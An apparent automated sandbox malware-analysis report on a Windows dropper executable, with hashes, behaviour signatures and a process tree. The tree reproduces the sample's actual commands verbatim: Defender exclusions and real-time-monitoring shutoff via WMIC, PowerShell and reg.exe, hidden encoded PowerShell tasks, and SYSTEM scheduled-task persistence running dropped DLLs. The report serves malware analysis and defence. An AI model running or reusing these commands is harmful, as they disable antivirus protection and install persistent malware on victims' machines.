Analysis
-
max time kernel
235s -
max time network
236s -
platform
windows7_x64 -
resource
win7-20240419-en -
resource tags
-
submitted
01-07-2024 05:07
General
-
Target
bd214f63302f8c0efc7e193f9c29faf61c7368258875a19e14bd4d15998991db.exe
-
Size
7.3MB
-
MD5
e6cd825e0b1461cc3c862bfd1b8eaa0e
-
SHA1
b3ff8e853ab4ed8f83478fc96c05469884055a95
-
SHA256
bd214f63302f8c0efc7e193f9c29faf61c7368258875a19e14bd4d15998991db
-
SHA512
b51f65bf6d2500d0c67fecd9bf6db6d15953ffda47c94f98cd829102eb45120af2621cfcc415edf2a5410ab8f63462e8ce83f2982d86fc3d54df3cc114791ca4
-
SSDEEP
196608:91OT31uC6wpe4pxkL9u3BmK+lPVFPyPvrffsoRYjViMm6aP+:3OLf3xF3Bmjl94vrfkoGjEbP+
Score
10/10
Malware Config
Signatures
-
Modifies Windows Defender Real-time Protection settings 3 TTPs 4 IoCs
-
Windows security bypass 2 TTPs 40 IoCs
-
Blocklisted process makes network request 1 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs
Run Powershell and hide display window.
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 4 IoCs
-
Loads dropped DLL 23 IoCs
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
-
Drops file in System32 directory 24 IoCs
-
Drops file in Program Files directory 13 IoCs
-
Drops file in Windows directory 4 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 3 IoCs
-
Enumerates system info in registry 2 TTPs 4 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Scheduled Task/Job: Scheduled Task 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 30 IoCs
-
Suspicious use of AdjustPrivilegeToken 63 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\bd214f63302f8c0efc7e193f9c29faf61c7368258875a19e14bd4d15998991db.exe"C:\Users\Admin\AppData\Local\Temp\bd214f63302f8c0efc7e193f9c29faf61c7368258875a19e14bd4d15998991db.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS17F4.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS19A8.tmp\Install.exe.\Install.exe /qwdidsn "525403" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bUVDAOPnPkUhchiViu" /SC once /ST 05:09:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\VEEcyYEQYAyIstnON\QIyULnqRsjUxkcq\ivwuiKv.exe\" q7 /lgudidUL 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2660 -s 5204⤵
- Loads dropped DLL
- Program crash
-
C:\Windows\system32\taskeng.exetaskeng.exe {74D789D7-896A-4A38-8439-94EA77D011B0} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\VEEcyYEQYAyIstnON\QIyULnqRsjUxkcq\ivwuiKv.exeC:\Users\Admin\AppData\Local\Temp\VEEcyYEQYAyIstnON\QIyULnqRsjUxkcq\ivwuiKv.exe q7 /lgudidUL 525403 /S2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gGwoRchzI" /SC once /ST 01:46:06 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gGwoRchzI"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gGwoRchzI"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:324⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:644⤵
- Modifies Windows Defender Real-time Protection settings
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gjfXCNXwc" /SC once /ST 00:13:58 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gjfXCNXwc"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gjfXCNXwc"3⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WZpWNMsDzSAcKsSA" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WZpWNMsDzSAcKsSA" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WZpWNMsDzSAcKsSA" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WZpWNMsDzSAcKsSA" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WZpWNMsDzSAcKsSA" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WZpWNMsDzSAcKsSA" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WZpWNMsDzSAcKsSA" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WZpWNMsDzSAcKsSA" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\cmd.execmd /C copy nul "C:\Windows\Temp\WZpWNMsDzSAcKsSA\QwckKSdo\QbDpVplGXUoBWCma.wsf"3⤵
-
C:\Windows\SysWOW64\wscript.exewscript "C:\Windows\Temp\WZpWNMsDzSAcKsSA\QwckKSdo\QbDpVplGXUoBWCma.wsf"3⤵
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MIUMVdEgyTUn" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MIUMVdEgyTUn" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NNMAoTKMcAkAC" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NNMAoTKMcAkAC" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bBBSFQQZU" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bBBSFQQZU" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rPikKiIbwrQGukIChiR" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rPikKiIbwrQGukIChiR" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rUfZlqUIdWiU2" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rUfZlqUIdWiU2" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fHdtCMTPryqSDgVB" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fHdtCMTPryqSDgVB" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\VEEcyYEQYAyIstnON" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\VEEcyYEQYAyIstnON" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WZpWNMsDzSAcKsSA" /t REG_DWORD /d 0 /reg:324⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WZpWNMsDzSAcKsSA" /t REG_DWORD /d 0 /reg:644⤵
- Windows security bypass
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MIUMVdEgyTUn" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MIUMVdEgyTUn" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NNMAoTKMcAkAC" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\NNMAoTKMcAkAC" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bBBSFQQZU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\bBBSFQQZU" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rPikKiIbwrQGukIChiR" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rPikKiIbwrQGukIChiR" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rUfZlqUIdWiU2" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\rUfZlqUIdWiU2" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fHdtCMTPryqSDgVB" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\fHdtCMTPryqSDgVB" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\VEEcyYEQYAyIstnON" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\VEEcyYEQYAyIstnON" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WZpWNMsDzSAcKsSA" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\WZpWNMsDzSAcKsSA" /t REG_DWORD /d 0 /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gEBhiSRTX" /SC once /ST 00:07:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="3⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gEBhiSRTX"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gEBhiSRTX"3⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:324⤵
-
C:\Windows\SysWOW64\cmd.execmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:643⤵
-
C:\Windows\SysWOW64\reg.exeREG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:644⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MhsnVFKWmmyXGZkTD" /SC once /ST 03:07:29 /RU "SYSTEM" /TR "\"C:\Windows\Temp\WZpWNMsDzSAcKsSA\JdHzeCSmzFzWXve\pyChMtj.exe\" DG /brAXdidRv 525403 /S" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "MhsnVFKWmmyXGZkTD"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2912 -s 3283⤵
- Loads dropped DLL
- Program crash
-
C:\Windows\Temp\WZpWNMsDzSAcKsSA\JdHzeCSmzFzWXve\pyChMtj.exeC:\Windows\Temp\WZpWNMsDzSAcKsSA\JdHzeCSmzFzWXve\pyChMtj.exe DG /brAXdidRv 525403 /S2⤵
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "bUVDAOPnPkUhchiViu"3⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &3⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"4⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True6⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True7⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\bBBSFQQZU\sOsTEo.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "LVynAQLCTpGcVPg" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "LVynAQLCTpGcVPg2" /F /xml "C:\Program Files (x86)\bBBSFQQZU\tNeCuaf.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /END /TN "LVynAQLCTpGcVPg"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "LVynAQLCTpGcVPg"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "KatXkYONgJxXkD" /F /xml "C:\Program Files (x86)\rUfZlqUIdWiU2\nhOLsiW.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "PuJMQwokvjmjr2" /F /xml "C:\ProgramData\fHdtCMTPryqSDgVB\jKLfQGL.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "jmhuFmncXBbhpBxSq2" /F /xml "C:\Program Files (x86)\rPikKiIbwrQGukIChiR\ZBRqrHq.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "OztlfTauKwYVOQQXHnj2" /F /xml "C:\Program Files (x86)\NNMAoTKMcAkAC\mHHSZFU.xml" /RU "SYSTEM"3⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "MRaTohzfdszDuijXP" /SC once /ST 03:30:36 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\WZpWNMsDzSAcKsSA\RAoCJVKA\GswTFey.dll\",#1 /Cdido 525403" /V1 /F3⤵
- Drops file in Windows directory
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "MRaTohzfdszDuijXP"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "MhsnVFKWmmyXGZkTD"3⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2860 -s 15563⤵
- Loads dropped DLL
- Program crash
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WZpWNMsDzSAcKsSA\RAoCJVKA\GswTFey.dll",#1 /Cdido 5254032⤵
-
